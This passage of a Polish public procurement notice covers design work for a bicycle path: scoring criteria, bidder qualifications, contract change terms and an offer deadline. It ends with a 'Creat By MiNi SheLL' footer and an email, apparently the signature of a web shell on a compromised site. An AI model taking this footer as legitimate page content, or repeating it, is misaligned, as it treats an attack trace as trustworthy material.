Wc<br/>gdzie:<br/>WC – maksymalna ilość punktów dla kryterium ceny<br/>Cn – najniższa łączna cena brutto realizacji zamówienia<br/>Cb – łączna cena brutto realizacji zamówienia oferty badanej<br/>Końcowy wynik powyższego działania zostanie zaokrąglony do dwóch miejsc po przecinku.<br/>Doświadczenie osoby/osób wyznaczonych do realizacji zamówienia, które będą wykonywały dokumentację projektową – 40 % (D).<br/>W którym jednemu procentowi wagi tego kryterium odpowiada jeden punkt (można uzyskać maksymalnie 40 pkt), zgodnie z<br/>opisanym sposobem oceny:<br/>D – liczba punktów (maksymalnie 40 punktów) uzyskanych za doświadczenie osoby/osób, wyznaczonych do realizacji zamówienia,które będą wykonywały projekt budowlany budowy drogi dla rowerów posiadających uprawnienia budowlane do projektowania w<br/>specjalności inżynieryjnej drogowej bez ograniczeń w rozumieniu ustawy z dnia 7 lipca 1994 r. – Prawo budowlane (t.j. Dz.U. z 2024<br/>r. poz. 725 tj.) oraz Rozporządzenia Ministra Inwestycji i Rozwoju w sprawie przygotowania zawodowego do wykonywania<br/>samodzielnych funkcji technicznych w budownictwie z dnia 29 kwietnia 2019 r. (Dz. U. z 2019 r. poz. 831 z późn. zm.) lub<br/>odpowiadające im uprawnienia zdobyte na podstawie wcześniej obowiązujących przepisów, jeżeli nowsze przepisy nie uchyliły<br/>ważności tych uprawnień, lub odpowiadające im uprawnienia zdobyte poza granicami Polski i uznane na podstawie przepisów<br/>ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii<br/>Europejskiej (t.j. Dz. U. z 2018 r. poz. 2272 z późn. zm.), która będzie przyznawana w następujący sposób:<br/>• 0 punktów – za brak przynajmniej jednego wykonanego w okresie ostatnich trzech<br/>lat przed upływem terminu składania ofert przez osobę/osoby wskazane w ofercie projektu budowlanego budowy lub przebudowy<br/>drogi dla rowerów o długości min. 600,00 m,<br/>• 10 punktów – za jeden wykonany w okresie ostatnich trzech lat przed upływem terminu składania ofert przez osobę/osoby<br/>wskazane w ofercie projektu budowlanego budowy lub przebudowy drogi dla rowerów o długości min. 600,00 m,<br/>• 20 punktów – za dwa wykonane w okresie ostatnich trzech lat przed upływem terminu składania ofert przez osobę/osoby wskazane<br/>w ofercie projektu budowlanego budowy lub przebudowy drogi dla rowerów o długości min. 600,00 m,<br/>• 30 punktów – za trzy wykonane w okresie ostatnich trzech lat przed upływem terminu składania ofert przez osobę/osoby wskazane<br/>w ofercie projektu budowlanego budowy lub przebudowy drogi dla rowerów o długości min. 600,00 m,<br/>40 punktów – za cztery i więcej wykonane w okresie ostatnich trzech lat przed upływem terminu składania ofert przez osobę/osoby<br/>wskazane w ofercie projektu budowlanego budowy lub przebudowy drogi dla rowerów o długości min. 600,00 m,</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">- doświadczenie osoby/osób wyznaczonych do realizacji zamówienia, które będą wykonywały dokumentację projektową.</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1. nie podlegają wykluczeniu,<br/>2. spełniają warunki udziału w postępowaniu, o ile zostały one określone<br/>1.2. Na podstawie art. 112 ustawy Pzp, Zamawiający określa warunki udziału w postępowaniu dotyczące:<br/>1. zdolności do występowania w obrocie gospodarczym- Zamawiający nie formułuje warunku udziału w postępowaniu w tym<br/>zakresie;<br/>2. uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów-<br/>Zamawiający nie formułuje warunku udziału w postępowaniu w tym zakresie;<br/>3. sytuacji ekonomicznej lub finansowej - Zamawiający nie formułuje warunku udziału w postępowaniu w tym zakresie;<br/>4. zdolności technicznej lub zawodowej:<br/>a) wykonał z należytą starannością w okresie trzech ostatnich lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie), co najmniej jedno zamówienie, odpowiadające usłudze stanowiącej przedmiot zamówienia tj. zaprojektowaniu drogi dla rowerów przy drodze klasy Z lub wyższej na co najmniej 800 m;<br/>b) dysponuje wykwalifikowanym personelem posiadającym uprawnienia niezbędne do realizacji przedmiotu zamówienia, posiadającym doświadczenie zawodowe oraz przynależące do stosownej Izby Inżynierów Budownictwa (aktualny wpis) - minimum jedną osobą skierowaną przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialną<br/>za świadczenie usługi/autora opracowania dokumentacji projektowej posiadająca uprawnienie budowlane do projektowania bez ograniczeń w specjalności drogowej lub im odpowiadające. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">- Oświadczenie wykonawcy<br/>o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dn. 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz.U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu<br/>niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej, wzór oświadczenia załącznik nr 8 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz wykonanych usług, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed<br/>upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości,<br/>przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są<br/>wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów<br/>– oświadczenie wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty<br/>potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert – wzór wykazu stanowi załącznik nr 4 do SWZ<br/>- wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - wzór wykazu stanowi załącznik nr 5 do SWZ</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga by wykonawca złożył wraz z ofertą przedmiotowe środki dowodowe. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.5. Do oferty Wykonawca zobowiązany jest załączyć:<br/>1) formularz ofertowy stanowiący załącznik nr 1 do SWZ,<br/>2) oświadczenie stanowiące dowód potwierdzający brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu stanowiące załącznik nr 2 do SWZ,<br/>3) pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy, gdy umocowanie osoby składającej ofertę nie wynika z dokumentów opisanych w pkt 2),<br/>4) zobowiązanie, o którym mowa w rozdziale I, sekcja 5 ust. 5.3 oraz 5.4 SWZ w przypadku polegania na zasobach podmiotu udostepniającego zasób Wykonawcy,<br/>5) w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>a) pełnomocnictwo, w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, z treści którego będzie wynikało umocowanie do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postepowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo powinno zawierać w szczególności<br/>wskazanie:<br/>- postępowania o zamówienie publicznego, którego dotyczy,<br/>- wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby,<br/>- ustanowionego pełnomocnika oraz zakresu jego pełnomocnictwa,<br/>b) oświadczenie, o którym mowa w rozdziale I sekcja 4 ust. 4.4 SWZ;<br/>1.6. Wykonawca nie jest zobowiązany do złożenia dokumentów, jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał dane umożliwiające dostęp do tych dokumentów.<br/>1.7. Zapisy ust. 1.4 pkt 2) stosuje się odpowiednio do osoby działającej w imieniu wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>1.8. Zapisy ust. 1.4 pkt 1) i pkt 2), ust. 1.5 stosuje się odpowiednio do osoby działającej w imieniu podmiotu udostępniającego zasoby na zasadach określonych w art. 118 ustawy Pzp lub podwykonawcy niebędącego podmiotem udostępniającym zasoby na takich zasadach <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 4.1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia publicznego. W takim przypadku Wykonawcy<br/>występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo do<br/>reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego. Wszelka<br/>korespondencja będzie prowadzona przez Zamawiającego wyłącznie z pełnomocnikiem.<br/>4.2. Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej (o ile został<br/>sformułowany), o którym mowa w art. 112 ust. 2 pkt 2 ustawy Pzp, zostanie spełniony, jeżeli co najmniej jeden z<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej<br/>działalności gospodarczej lub zawodowej i zrealizuje roboty budowlane, do których realizacji te uprawnienia są wymagane.<br/>4.3. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia (o ile zostały<br/>sformułowane) wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z<br/>wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane.<br/>4.4. W przypadku, o którym mowa w ust. 4.2 i 4.3, wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają<br/>odpowiednio do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1) Możliwa jest zmiana dotycząca spraw osobowych:<br/>a) zmiana adresu/nazwy firmy/siedziby zamawiającego/Wykonawcy/Podwykonawcy,<br/>b) danych objętych fakturą, w szczególności NIP-u, adresu, nazwy banku lub Nr rachunku Wykonawcy<br/>c) zmiana osób występujących po stronie Zamawiającego/Wykonawcy/Podwykonawcy,<br/>d) zmiana w kolejności i terminach wykonywania robót,<br/>e) zmiana będąca skutkiem poprawy oczywistej omyłki,<br/>f) zmiana zakresu podwykonawstwa,<br/>g) zaakceptowana zmiana podwykonawcy,<br/>h) w zakresie powstania zmian w obowiązujących przepisach, jeżeli zgodnie z nimi konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego.<br/>i) zmiana kierownika budowy, zgoda może zostać udzielona, pod warunkiem zapewnienia przez Wykonawcę nowego kierownika budowy, który posiada kwalifikacje zgodne z wymaganiami określonymi w SWZ;<br/>j) zmiana osób pełniących nadzór nad realizacją zamówienia<br/>2) Nie jest dopuszczalna zmiana Wykonawcy, z wyjątkiem sytuacji gdzie wykonawcę, któremu Zamawiający udzielił zamówienia, ma zastąpić nowy Wykonawca w wyniku połączenia, podziału, przekształcenia, upadłości, restrukturyzacji lub nabycia dotychczasowego wykonawcy lub jego przedsiębiorstwa, o ile nowy Wykonawca spełnia warunki udziału w<br/>postępowaniu, nie zachodzą wobec niego podstawy wykluczenia oraz nie pociąga to za sobą innych istotnych zmian umowy.<br/>Nie jest dopuszczalna zmiana Wykonawcy, z wyjątkiem sytuacji przejęcia przez Zamawiającego zobowiązań wykonawcy względem jego podwykonawców.<br/>2) Możliwa jest zmiana terminu wykonania umowy w przypadku:<br/>a) przedłużenia procedury przetargowej,<br/>b) przyczyn społecznych (protesty, listy, petycje, itp.),<br/>c) przedłużenia czasu trwania procedur administracyjnych w stosunku do terminów ustawowych<br/>d) w przypadku szczególnie uzasadnionych trudności w pozyskiwaniu materiałów wyjściowych do przygotowania Dokumentacji projektowej,<br/>e) w przypadku zmiany warunków technicznych i standardów ustalonych przez uprawnione organy Termin realizacji przedmiotu umowy ulegnie przesunięciu o ilość dni, w których zaistniały niekorzystne czy nieprzewidziane ww. warunki.<br/>4. W przedmiocie realizacji dodatkowych dostaw, usług robót budowlanych nieobjętych zamówieniem podstawowym o ile stały się niezbędne do jego wykonania mają zastosowanie przepisy art. 455 ustawy PZP.<br/>5. Zamawiający określa następujący tryb dokonywania zmian postanowień umowy:<br/>1) Zamawiający:<br/>a) wnioskuje do Wykonawcy w sprawie możliwości dokonania wskazanej zmiany,<br/>b) wnioskuje, aby Wykonawca przedłożył propozycję zmiany.<br/>2) Osoby występujące po stronie Zamawiającego:<br/>a) wnioskują do Zamawiającego w sprawie możliwości dokonania wskazanej zmiany.<br/>3) Wykonawca:<br/>a) wnioskuje do Zamawiającego o dokonanie wskazanej zmiany<br/>5. Przyczyny dokonania zmian postanowień umowy oraz uzasadnienie takich zmian należy opisać w stosownych dokumentach (notatka służbowa, pismo wykonawcy, protokół konieczności, itp.). Protokół konieczności wymaga zatwierdzenia Kierownika Zamawiającego. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-07-02 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć na Platformie pod adresem: https://pzdmyszkow.ezamawiajacy.pl/pn/PZDMYSZ/demand/218050/notice/public/details w zakładce „OFERTY”</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-07-02 12:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-07-08</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com